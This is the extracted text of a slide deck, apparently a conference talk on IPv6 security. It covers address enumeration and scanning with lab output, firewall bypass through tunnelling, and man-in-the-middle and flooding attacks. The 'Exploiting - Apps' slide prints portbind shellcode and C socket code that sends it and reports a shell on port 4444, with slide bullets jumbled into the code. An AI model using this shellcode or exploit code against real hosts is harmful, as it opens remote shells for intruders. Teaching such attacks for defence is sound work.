2. Who?
• Don Anto
• Information security manager
• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
• A dead security researcher
• Involve in security field for almost 10 years
• Genius evil thinker; professional troublemaker
• @djantoxz
3. IPv6 - Why?
• Analog to digital convergence (E.G: Voice over IP)
• The use of virtualization (E.G: Cloud)
• Embedded devices (Smart phone, RFID) networking
• All increase the needs of unique IP Address
• So, more IP Address spaces are required!
• Finally, IPv4 Address Exhaustion
4. IPv6 - What?
• The latest version of Internet Protocol (IP), and is intended to
replace IPv4
• 128 bit IP Addressing, instead of 32 bit, to multiply IP address
space
• IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038)
• Not using dot decimal anymore, otherwise hexadecimal with
colon is used
• E.G:
• 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
• 2001:470:0:64::2
• fe80::1
5. IPv6 Fundamentals
Source: Fernando Gont Presentation
• IPv6 header, 40 Bytes Fixed Length
• Source address 16 bytes, destination address 16 bytes
• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
6. IPv6 Fundamentals
• IPv6 Address Type:
• Loopback
• Unspecified
• Multicast
• Anycast
• Local unicast
• Global unicast
• Subneting
• Routing
Source: Fernando Gont Presentation
9. Security Issues
• Large space of IPv6 address (enumeration, scanning, managing)
• The use of tunneling? The use of dual-stack networking?
• Weakness in IPv6 itself? (protocol level vulnerabilities)
• Weakness of Application ran on IPv6
10. Enumeration
• Discovery through multicast address (FF02::1)
ipv6lab ->./alive6 eth4
• Discovery through ICMPv6 Echo Request
Alive: dead:beaf::3
• Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1
• Discovery through SNMP Query Found 2 systems alive
• Google helps us to find IPv6 domains
• The presence of IPAM may be help
ipv6lab->host -t A www.jp.freebsd.org
www.jp.freebsd.org has address 119.245.129.228
ipv6lab->host -t AAAA www.jp.freebsd.org
www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
ipv6lab->ping6 -I eth4 ff02::1
PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
ipv6lab->ip -6 neigh show
fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
11. ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3
Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on dead:beaf::3:
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
Scanning
ipv6lab->nmap -sV -PN -T4 192.168.137.103
Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on 192.168.137.103:
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)
v4 to v6 proxy is usually
helpful E.G: Socat
apt-get install socat
• Port Scanning (Tools with IPv6 support)
• Vulnerability Scanning (Tools with IPv6 support)
12. Perimeter Defense Bypass
• Does Firewall protect both IPv4 and IPv6 network?
• Does IDS/IPS protect both IPv4 and IPv6 network?
• TEREDO tunneling can be used to bypass NAT and to
compromise internal network
• The use of dual stack and tunneling mandates the protection
for IPv4 and IPv6
13. Perimeter Defense Bypass
• IPv4 is well governed by firewall using NAT or policies
• Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ
• Even worse, someone may directly access the internal network from internet
14. Exploiting - Protocols
• IPv6 also designed to increase security of IPv4, unfortunately
there is no significant improvement
• Some problems in IPv4 is still persistent in IPv6
• Man In The Middle Attack
• Denial of Services Attack
• More and more
15. Man In The Middle
• Spoofed ICMP Neighbor Advertisement (replacing ARP in v4)
• Spoofed ICMP Router Advertisement
• Spoofed ICMP Redirect or ICMP Toobig to implant routing
• Rogue DHCPv6 Server (replacing DHCP server in v4)
• More and more
Source Image: OWASP website
Used to help packet sniffing
16. Denial of Services
anto# ifstat -b
eth0
• Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out
9851.48 1.08
• Prevent new IPv6 address with DAD 10244.34 0.95
• CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95
• Routing loop attack utilizes automatic tunneling 9165.56 0.95
• ICMP attack against TCP to tear down BGP session 9358.11 0.95
10165.01 0.95
9802.98 0.95
9353.34 0.95
anto# tcpdump -n -i eth0 dst host dead:beaf::3
20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
4700 packets captured
4884 packets received by filter
93 packets dropped by kernel
17. Exploiting - Apps
char shellcode[] = /*Portbind @ 4444*/
"xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow
"xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64"
"x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68"
• Remote Format String
"xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One
"xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks
"x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8"
• More Attacks?!
"xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51"
"xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference
"x2ex72x27x32x30"; • Socket programming &
shellcodes
for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){
if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){
v4 to v6 proxy is usually printf("can't create socketn");
exit(0);
helpful E.G: Socat }
apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen);
send(s,buffer,len,0);
printf("Check your shell on %s TCP port 4444n",argv[1]);
}